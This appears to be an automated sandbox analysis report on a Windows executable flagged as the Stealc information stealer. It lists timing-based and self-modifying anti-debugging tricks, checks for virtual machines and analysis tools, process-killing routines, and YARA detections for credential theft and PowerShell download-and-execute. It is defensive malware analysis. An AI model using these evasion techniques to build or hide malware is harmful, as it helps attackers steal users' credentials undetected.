              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64481 second address: A64487 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6460B second address: A6460F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6460F second address: A64643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3BAC7E5E0Ah 0x0000000d ja 00007F3BAC7E5E1Ch 0x00000013 jmp 00007F3BAC7E5E16h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64643 second address: A64662 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F3BACE24FE2h 0x0000000e js 00007F3BACE24FD6h 0x00000014 jp 00007F3BACE24FD6h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64B0C second address: A64B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F3BAC7E5E06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64B1A second address: A64B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64B1F second address: A64B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BAC7E5E0Dh 0x00000009 ja 00007F3BAC7E5E06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64DAE second address: A64DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BACE24FE8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64DCA second address: A64DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3BAC7E5E0Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A650BD second address: A650C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A650C4 second address: A65122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ch 0x00000007 pushad 0x00000008 jmp 00007F3BAC7E5E0Dh 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F3BAC7E5E13h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 jbe 00007F3BAC7E5E25h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65122 second address: A65126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66A09 second address: A66A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F3BAC7E5E06h 0x0000000c popad 0x0000000d js 00007F3BAC7E5E0Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B11C second address: A6B134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B134 second address: A6B13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B13E second address: A6B174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F3BACE24FDCh 0x00000011 jo 00007F3BACE24FEFh 0x00000017 jmp 00007F3BACE24FE9h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACAA second address: A6ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACB0 second address: A6ACB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACB6 second address: A6ACCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F3BAC7E5E0Ch 0x0000000b jno 00007F3BAC7E5E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F3BAC7E5E06h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470292 second address: 5470298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470298 second address: 547029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547029C second address: 54702A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702A0 second address: 54702C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3BAC7E5E0Ch 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3BAC7E5E0Eh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702C6 second address: 54702CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702CC second address: 54702D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702D0 second address: 54702F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3BACE24FDDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702F3 second address: 5470303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BAC7E5E0Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470303 second address: 5470332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F3BACE24FE6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470332 second address: 547034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E13h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470366 second address: 547037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547037F second address: 5470384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470384 second address: 54703D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3BB56BE0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F3BACE24FE4h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov bl, 5Ah 0x0000001a pushfd 0x0000001b jmp 00007F3BACE24FE6h 0x00000020 adc si, A088h 0x00000025 jmp 00007F3BACE24FDBh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703D6 second address: 54703DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703DC second address: 54703E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703E0 second address: 54703E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98AE62 second address: 98AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98AE66 second address: 98AEA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3BAC7E5E0Dh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F3BAC7E5E0Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98AEA1 second address: 98AEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 97E767 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7DD3CE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 98FBCD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A05D9B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-30012
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-28822
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.5 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005AE330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005A1C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A3CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ACCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005ACCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059DD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0059DD70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A15C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005915B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005915B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005915A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005915A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ADE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_005ADE50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005AD640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A4EC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005A2749
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_005A2730
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B3190 GetSystemInfo,wsprintfA,0_2_005B3190
              Source: file.exe, file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1716207781.0000000001634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1716207781.0000000001664000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-28692
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00594980 VirtualProtect 00000000,00000004,00000100,?0_2_00594980
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005B63C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B63C0 mov eax, dword ptr fs:[00000030h]0_2_005B63C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005B29E0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1136, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B4630 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_005B4630
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B46C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_005B46C0
              Source: file.exe, file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: pHw2Program Manager
              Source: file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: opHw2Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_005B2D00
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B2B00 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_005B2B00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005B29E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B2BB0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_005B2BB0

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1136, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
